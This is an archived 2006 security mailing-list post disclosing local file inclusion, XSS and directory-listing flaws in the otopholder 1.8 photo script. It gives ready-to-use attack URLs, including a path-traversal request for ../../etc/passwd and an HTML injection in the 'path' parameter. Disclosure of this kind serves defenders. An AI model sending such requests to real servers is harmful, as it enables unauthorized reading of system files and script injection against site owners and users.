otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

Subject: otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
Date: 15 Aug 2006 10:43:38 -0000
From: suppressed

vendor:
http://www.jakeo.com

vuln :
http://[host]/foto/index.php?path=../../etc/passwd

http://[host]/foto/index.php?path=<b>xss</b>

http://[host]/foto/index.php?path=../../[directory listing]


Author : Vampire 

suppressed

Homepage : Www.HackerZ.iR

Www.H4ckerZ.Com

Iran HackerZ Security Team

Prev by Date: [security bulletin] HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS)
Next by Date: Re: Concurrency-related vulnerabilities in browsers - expect problems
Previous by thread: [security bulletin] HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS)
Next by thread: Re: Concurrency-related vulnerabilities in browsers - expect problems
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.